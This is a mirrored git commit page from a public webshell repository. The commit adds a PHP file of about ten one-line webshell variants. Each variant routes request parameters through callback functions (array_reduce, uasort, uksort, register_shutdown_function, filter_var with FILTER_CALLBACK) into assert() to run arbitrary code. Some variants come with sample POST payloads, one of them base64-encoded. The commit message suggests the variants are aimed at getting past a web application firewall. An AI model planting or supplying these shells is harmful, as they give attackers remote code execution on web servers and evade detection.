mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create 2020.08.20.17.php
killed by safedog from : https://www.sqlsec.com/2020/07/shell.html
This commit is contained in:
parent
cd1e25025a
commit
0d1874b235
1 changed files with 62 additions and 0 deletions
62
php/2020.08.20.17.php
Normal file
62
php/2020.08.20.17.php
Normal file
|
@ -0,0 +1,62 @@
|
|||
<?php
|
||||
$e = $_REQUEST['e'];
|
||||
$arr = array(1);
|
||||
array_reduce($arr, $e, $_POST['x']);
|
||||
?>
|
||||
|
||||
post: e=assert&x=phpinfo();
|
||||
|
||||
<?php
|
||||
$e = $_REQUEST['e'];
|
||||
$arr = array($_POST['x']);
|
||||
$arr2 = array(1);
|
||||
array_udiff($arr, $arr2, $e);
|
||||
?>
|
||||
|
||||
post: e=assert&x=phpinfo();
|
||||
|
||||
<?php
|
||||
$e = $_REQUEST['e'];
|
||||
$arr = array('test', $_REQUEST['x']);
|
||||
uasort($arr, base64_decode($e));
|
||||
?>
|
||||
|
||||
post: e=YXNzZXJ0&x=phpinfo();
|
||||
|
||||
<?php
|
||||
$arr = new ArrayObject(array('test', $_REQUEST['x']));
|
||||
$arr->uasort('assert');
|
||||
?>
|
||||
|
||||
<?php
|
||||
$e = $_REQUEST['e'];
|
||||
$arr = array('test' => 1, $_REQUEST['x'] => 2);
|
||||
uksort($arr, $e);
|
||||
?>
|
||||
|
||||
post: e=assert&x=phpinfo();
|
||||
|
||||
<?php
|
||||
$arr = new ArrayObject(array('test' => 1, $_REQUEST['x'] => 2));
|
||||
$arr->uksort('assert');
|
||||
?>
|
||||
|
||||
<?php
|
||||
$e = $_REQUEST['e'];
|
||||
register_shutdown_function($e, $_REQUEST['x']);
|
||||
?>
|
||||
|
||||
<?php
|
||||
$e = $_REQUEST['e'];
|
||||
declare(ticks=1);
|
||||
register_tick_function ($e, $_REQUEST['x']);
|
||||
?>
|
||||
|
||||
<?php
|
||||
filter_var($_REQUEST['x'], FILTER_CALLBACK, array('options' => 'assert'));
|
||||
?>
|
||||
|
||||
<?php
|
||||
filter_var_array(array('test' => $_REQUEST['x']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
|
||||
?>
|
||||
|
Loading…
Reference in a new issue